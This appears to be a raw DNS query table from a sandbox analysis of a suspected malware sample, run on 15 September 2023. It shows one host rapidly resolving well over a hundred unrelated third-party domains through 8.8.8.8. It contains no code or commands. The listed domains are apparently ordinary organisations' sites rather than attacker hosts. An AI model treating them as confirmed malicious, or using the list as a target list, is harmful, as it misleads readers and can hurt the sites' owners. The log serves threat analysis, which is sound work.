                                                                                                                                                                              Sep 15, 2023 07:27:27.609718084 CEST192.168.2.38.8.8.80x8469Standard query (0)nme.co.jpA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:27.655667067 CEST192.168.2.38.8.8.80xa0d0Standard query (0)holp-ai.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:27.752331972 CEST192.168.2.38.8.8.80x5f54Standard query (0)nolaoig.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:27.798749924 CEST192.168.2.38.8.8.80x13caStandard query (0)invictus.plA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:27.857511997 CEST192.168.2.38.8.8.80x4e56Standard query (0)multip.huA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:27.986018896 CEST192.168.2.38.8.8.80x6005Standard query (0)e-kami.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:28.076673031 CEST192.168.2.38.8.8.80xd2aStandard query (0)multip.huA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:28.112723112 CEST192.168.2.38.8.8.80x1c60Standard query (0)univi.itA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:28.177409887 CEST192.168.2.38.8.8.80xb4e8Standard query (0)multip.huA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:28.317481041 CEST192.168.2.38.8.8.80x99d5Standard query (0)h-et-l.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:28.350440979 CEST192.168.2.38.8.8.80x1aaeStandard query (0)bount.com.twA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:28.426806927 CEST192.168.2.38.8.8.80x4784Standard query (0)slower.itA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:28.550738096 CEST192.168.2.38.8.8.80x1935Standard query (0)nettle.plA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:28.824959040 CEST192.168.2.38.8.8.80xe7bfStandard query (0)rast.seA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:28.826925039 CEST192.168.2.38.8.8.80xc52aStandard query (0)h-et-l.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:28.871407032 CEST192.168.2.38.8.8.80xf3b5Standard query (0)skgm.ruA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:28.885499954 CEST192.168.2.38.8.8.80xdb3dStandard query (0)pers.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:29.040493011 CEST192.168.2.38.8.8.80xa35cStandard query (0)hchc.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:29.178535938 CEST192.168.2.38.8.8.80xefc8Standard query (0)esmoke.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:29.311000109 CEST192.168.2.38.8.8.80xe7c5Standard query (0)rappich.deA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:29.317156076 CEST192.168.2.38.8.8.80xbb3fStandard query (0)cbaben.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:29.391851902 CEST192.168.2.38.8.8.80x1b08Standard query (0)infotech.plA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:29.537919998 CEST192.168.2.38.8.8.80x5fffStandard query (0)holp-ai.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:29.878518105 CEST192.168.2.38.8.8.80xd703Standard query (0)adventist.roA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:29.912166119 CEST192.168.2.38.8.8.80x453Standard query (0)pcoyuncu.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:30.013778925 CEST192.168.2.38.8.8.80x5247Standard query (0)pcoyuncu.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:30.097218990 CEST192.168.2.38.8.8.80xb55eStandard query (0)iranytu.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:30.131979942 CEST192.168.2.38.8.8.80xe0e3Standard query (0)pcoyuncu.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:30.214252949 CEST192.168.2.38.8.8.80xf98cStandard query (0)iranytu.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:30.310436964 CEST192.168.2.38.8.8.80x8bb4Standard query (0)workplus.huA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:30.314702034 CEST192.168.2.38.8.8.80x8dd6Standard query (0)iranytu.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:30.417969942 CEST192.168.2.38.8.8.80x21cStandard query (0)touchfam.caA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:30.427278996 CEST192.168.2.38.8.8.80x9444Standard query (0)acraloc.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:30.433808088 CEST192.168.2.3198.32.64.120xa7Standard query (0)orgNS (Name server)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:30.505462885 CEST192.168.2.38.8.8.80xa256Standard query (0)msl-lock.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:30.570945024 CEST192.168.2.38.8.8.80x827cStandard query (0)shittas.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:30.617027044 CEST192.168.2.38.8.8.80xd982Standard query (0)roewer.deA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:30.653345108 CEST192.168.2.3198.32.64.120xe2Standard query (0)comNS (Name server)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:30.758045912 CEST192.168.2.38.8.8.80x85c6Standard query (0)siongann.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:30.944111109 CEST192.168.2.38.8.8.80xab3bStandard query (0)fortknox.bmA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:31.129566908 CEST192.168.2.38.8.8.80xd6b6Standard query (0)kallman.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:31.141480923 CEST192.168.2.38.8.8.80x2279Standard query (0)cbras.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:31.234596014 CEST192.168.2.38.8.8.80xbf31Standard query (0)e-asset.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:31.495837927 CEST192.168.2.38.8.8.80xb22fStandard query (0)kallman.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:31.546804905 CEST192.168.2.38.8.8.80x98c4Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:31.547035933 CEST192.168.2.38.8.8.80x5a7cStandard query (0)cpwpb.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:31.625885963 CEST192.168.2.38.8.8.80xf47dStandard query (0)ncn.deA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:31.629709005 CEST192.168.2.38.8.8.80xfe22Standard query (0)e-asset.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:31.651894093 CEST192.168.2.38.8.8.80x9405Standard query (0)cpwpb.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:31.691718102 CEST192.168.2.38.8.8.80xcdcdStandard query (0)kallman.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:31.758951902 CEST192.168.2.38.8.8.80x2ce4Standard query (0)cpwpb.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:31.904836893 CEST192.168.2.38.8.8.80xbadStandard query (0)absblast.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:32.016875029 CEST192.168.2.38.8.8.80x63a5Standard query (0)jsaps.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:32.017498970 CEST192.168.2.38.8.8.80x88d2Standard query (0)x96.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:32.021687031 CEST192.168.2.38.8.8.80x36fbStandard query (0)e-asset.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:32.110219002 CEST192.168.2.38.8.8.80x470aStandard query (0)ifesnet.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:32.467494011 CEST192.168.2.38.8.8.80xf98dStandard query (0)htsmx.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:32.541493893 CEST192.168.2.38.8.8.80x98c4Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:32.547218084 CEST192.168.2.38.8.8.80x65b0Standard query (0)themark.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:32.606076002 CEST192.168.2.38.8.8.80x1359Standard query (0)cpwpb.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:32.700501919 CEST192.168.2.38.8.8.80xf476Standard query (0)cpwpb.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:32.748547077 CEST192.168.2.38.8.8.80x3109Standard query (0)mail.airmail.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:32.827467918 CEST192.168.2.38.8.8.80x8a48Standard query (0)cpwpb.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:32.832477093 CEST192.168.2.38.8.8.80xc7c4Standard query (0)kavram.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:32.841347933 CEST192.168.2.38.8.8.80xc770Standard query (0)noblesse.beA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:32.858539104 CEST192.168.2.38.8.8.80x2ad8Standard query (0)calvinly.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:32.951813936 CEST192.168.2.38.8.8.80xf773Standard query (0)reproar.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:33.389770031 CEST192.168.2.38.8.8.80xe4bcStandard query (0)s5w.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:33.478969097 CEST192.168.2.38.8.8.80xf98dStandard query (0)htsmx.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:33.561547041 CEST192.168.2.38.8.8.80x98c4Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:33.687064886 CEST192.168.2.38.8.8.80x6dbeStandard query (0)isom.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:33.832245111 CEST192.168.2.38.8.8.80x431bStandard query (0)agitz.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:33.842881918 CEST192.168.2.38.8.8.80x79edStandard query (0)beafin.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:34.012914896 CEST192.168.2.38.8.8.80x2649Standard query (0)nettlinx.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:34.050250053 CEST192.168.2.38.8.8.80xfce0Standard query (0)agitz.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:34.289500952 CEST192.168.2.38.8.8.80x1699Standard query (0)agitz.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:34.327517986 CEST192.168.2.38.8.8.80xfcdStandard query (0)anteph.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:34.389859915 CEST192.168.2.38.8.8.80xc680Standard query (0)sgk.home.plA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:34.434995890 CEST192.168.2.38.8.8.80x8f84Standard query (0)anteph.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:34.495698929 CEST192.168.2.38.8.8.80xf98dStandard query (0)htsmx.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:34.540182114 CEST192.168.2.38.8.8.80x7970Standard query (0)anteph.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:34.926522017 CEST192.168.2.38.8.8.80xf99dStandard query (0)multip.huA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:35.126008987 CEST192.168.2.38.8.8.80x66daStandard query (0)multip.huA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:35.227513075 CEST192.168.2.38.8.8.80xf4c6Standard query (0)multip.huA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:35.547657967 CEST192.168.2.38.8.8.80x41b9Standard query (0)4locals.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:35.549041986 CEST192.168.2.38.8.8.80xc20aStandard query (0)www.reglera.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:35.572259903 CEST192.168.2.38.8.8.80x98c4Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:35.655451059 CEST192.168.2.38.8.8.80x72edStandard query (0)themark.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:35.713609934 CEST192.168.2.3198.32.64.120xa7Standard query (0)orgNS (Name server)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:35.928877115 CEST192.168.2.38.8.8.80xa28aStandard query (0)fundeo.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:35.931926012 CEST192.168.2.3198.32.64.120xe2Standard query (0)comNS (Name server)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:36.188560009 CEST192.168.2.38.8.8.80x9c23Standard query (0)wantapc.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:36.424048901 CEST192.168.2.38.8.8.80x765cStandard query (0)rokoron.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:36.656172991 CEST192.168.2.38.8.8.80x71b4Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:36.700896025 CEST192.168.2.38.8.8.80x7a4fStandard query (0)agitz.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:36.732530117 CEST192.168.2.38.8.8.80xbaf5Standard query (0)averwin.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:36.800457954 CEST192.168.2.38.8.8.80x65baStandard query (0)agitz.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:36.811441898 CEST192.168.2.38.8.8.80xe4Standard query (0)a-domani.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:37.000529051 CEST192.168.2.38.8.8.80xe4a5Standard query (0)agitz.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:37.016829967 CEST192.168.2.38.8.8.80x88a6Standard query (0)nblewis.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:37.024223089 CEST192.168.2.38.8.8.80xc49bStandard query (0)averwin.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:37.123550892 CEST192.168.2.38.8.8.80x9186Standard query (0)averwin.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:37.178330898 CEST192.168.2.38.8.8.80x49c8Standard query (0)kursavto.ruA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:37.179923058 CEST192.168.2.38.8.8.80xf8c6Standard query (0)pertex.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:37.343290091 CEST192.168.2.38.8.8.80x37aStandard query (0)from30ty.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:37.492440939 CEST192.168.2.38.8.8.80x5f3aStandard query (0)www.yumgiskor.kzA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:37.666369915 CEST192.168.2.38.8.8.80x71b4Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:38.172475100 CEST192.168.2.38.8.8.80x17ebStandard query (0)web-york.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:38.474987030 CEST192.168.2.38.8.8.80x2ea8Standard query (0)tbvlugus.nlA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:38.669962883 CEST192.168.2.38.8.8.80x2959Standard query (0)ftchat.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:38.670958996 CEST192.168.2.38.8.8.80x71b4Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:38.692214012 CEST192.168.2.38.8.8.80xdbedStandard query (0)a-domani.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:38.693593025 CEST192.168.2.38.8.8.80x2c67Standard query (0)vdoherty.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:38.695297003 CEST192.168.2.38.8.8.80x847Standard query (0)nlcv.bas.bgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:38.700385094 CEST192.168.2.38.8.8.80x4121Standard query (0)themark.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:38.701970100 CEST192.168.2.38.8.8.80x253dStandard query (0)anteph.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:38.703680992 CEST192.168.2.38.8.8.80xdd48Standard query (0)web-york.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:38.729443073 CEST192.168.2.38.8.8.80x908bStandard query (0)gcss.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:38.747232914 CEST192.168.2.38.8.8.80x2b17Standard query (0)simetar.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:38.749416113 CEST192.168.2.38.8.8.80x72f8Standard query (0)johnlyon.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:38.752486944 CEST192.168.2.38.8.8.80xa600Standard query (0)webband.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:38.758450985 CEST192.168.2.38.8.8.80x1564Standard query (0)sidepath.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:38.770328999 CEST192.168.2.38.8.8.80xee7bStandard query (0)agitz.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:38.830574989 CEST192.168.2.38.8.8.80x891fStandard query (0)ccrsi.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:38.877110004 CEST192.168.2.38.8.8.80x6974Standard query (0)agitz.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:38.915002108 CEST192.168.2.38.8.8.80xdb7fStandard query (0)lpver.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:38.915002108 CEST192.168.2.38.8.8.80x434dStandard query (0)bount.com.twA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:38.915121078 CEST192.168.2.38.8.8.80xb53aStandard query (0)riwn.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:38.916174889 CEST192.168.2.38.8.8.80x7bd0Standard query (0)tcpoa.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:38.917190075 CEST192.168.2.38.8.8.80x290aStandard query (0)scintel.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:38.918414116 CEST192.168.2.38.8.8.80x745Standard query (0)vfcindia.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:38.955830097 CEST192.168.2.38.8.8.80x498cStandard query (0)samtv.roA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:38.958570004 CEST192.168.2.38.8.8.80x2da8Standard query (0)webband.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.001842022 CEST192.168.2.38.8.8.80xeff7Standard query (0)agitz.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.017220020 CEST192.168.2.38.8.8.80x97e6Standard query (0)nt-hat.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.030606985 CEST192.168.2.38.8.8.80x757fStandard query (0)kavram.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.033206940 CEST192.168.2.38.8.8.80xcef3Standard query (0)doggybag.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.034770012 CEST192.168.2.38.8.8.80xaecdStandard query (0)ludea.czA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.036780119 CEST192.168.2.38.8.8.80x48d3Standard query (0)tabbles.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.037370920 CEST192.168.2.38.8.8.80x851eStandard query (0)gphpedit.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.066520929 CEST192.168.2.38.8.8.80xe153Standard query (0)piacton.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.067167997 CEST192.168.2.38.8.8.80x8b2bStandard query (0)samtv.roA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.074112892 CEST192.168.2.38.8.8.80x4abStandard query (0)dhh.la.govA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.074285030 CEST192.168.2.38.8.8.80xf545Standard query (0)univi.itA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.093394041 CEST192.168.2.38.8.8.80x661eStandard query (0)dog-jog.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.110812902 CEST192.168.2.38.8.8.80xd4Standard query (0)nblewis.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.146394968 CEST192.168.2.38.8.8.80x7ce0Standard query (0)webband.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.156114101 CEST192.168.2.38.8.8.80x2055Standard query (0)wahw.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.160716057 CEST192.168.2.38.8.8.80xee4cStandard query (0)jsaps.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.160954952 CEST192.168.2.38.8.8.80xbe7aStandard query (0)xsui.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.161358118 CEST192.168.2.38.8.8.80x4a9Standard query (0)toundo.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.164066076 CEST192.168.2.38.8.8.80x8277Standard query (0)averwin.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.169958115 CEST192.168.2.38.8.8.80x9016Standard query (0)nekono.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.171659946 CEST192.168.2.38.8.8.80x4dbStandard query (0)samtv.roA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.172616959 CEST192.168.2.38.8.8.80x8941Standard query (0)cjcagent.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.174051046 CEST192.168.2.38.8.8.80x1a92Standard query (0)banvari.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.174804926 CEST192.168.2.38.8.8.80xd504Standard query (0)kevyt.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.184597015 CEST192.168.2.38.8.8.80x237aStandard query (0)piacton.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.242957115 CEST192.168.2.38.8.8.80x2f66Standard query (0)amic.atA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.254234076 CEST192.168.2.38.8.8.80x5791Standard query (0)ramkome.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.291857958 CEST192.168.2.38.8.8.80xdd86Standard query (0)nt-hat.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.296215057 CEST192.168.2.38.8.8.80x2b75Standard query (0)piacton.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.309089899 CEST192.168.2.38.8.8.80xc87Standard query (0)gcss.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.367347956 CEST192.168.2.38.8.8.80xac48Standard query (0)cyclad.plA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.368041039 CEST192.168.2.38.8.8.80x6e25Standard query (0)amerifor.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.369663954 CEST192.168.2.38.8.8.80x6745Standard query (0)coxkitchensandbaths.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.375195026 CEST192.168.2.38.8.8.80xf5dbStandard query (0)ccssinc.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.376182079 CEST192.168.2.38.8.8.80xf1faStandard query (0)uster.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.377818108 CEST192.168.2.38.8.8.80xd571Standard query (0)nettlinx.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.383383989 CEST192.168.2.38.8.8.80xd37eStandard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.383831978 CEST192.168.2.38.8.8.80x4d73Standard query (0)uhsa.edu.agA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.394315004 CEST192.168.2.38.8.8.80x5ce7Standard query (0)leapc.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.398016930 CEST192.168.2.38.8.8.80x7241Standard query (0)ldh.la.govA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.398219109 CEST192.168.2.38.8.8.80x21bcStandard query (0)shiner.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.443607092 CEST192.168.2.38.8.8.80xbf0dStandard query (0)daytonir.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.460593939 CEST192.168.2.38.8.8.80x65fdStandard query (0)magicomm.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.466728926 CEST192.168.2.38.8.8.80x564cStandard query (0)enguita.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.490880013 CEST192.168.2.38.8.8.80x61b9Standard query (0)cbras.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.495763063 CEST192.168.2.38.8.8.80xd766Standard query (0)averwin.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.534635067 CEST192.168.2.38.8.8.80x9945Standard query (0)scip.org.ukA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.551980019 CEST192.168.2.38.8.8.80x27a7Standard query (0)nt-hat.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.555788040 CEST192.168.2.38.8.8.80x3816Standard query (0)lyto.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.555818081 CEST192.168.2.38.8.8.80xa2f8Standard query (0)rkengg.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.555917978 CEST192.168.2.38.8.8.80x5564Standard query (0)burstner.ruA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.559770107 CEST192.168.2.38.8.8.80x96bdStandard query (0)leapc.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.564307928 CEST192.168.2.38.8.8.80xc409Standard query (0)hubbikes.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.564307928 CEST192.168.2.38.8.8.80x6bc6Standard query (0)banvari.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.565990925 CEST192.168.2.38.8.8.80xe587Standard query (0)dwid.deA (IP address)IN (0x0001)false
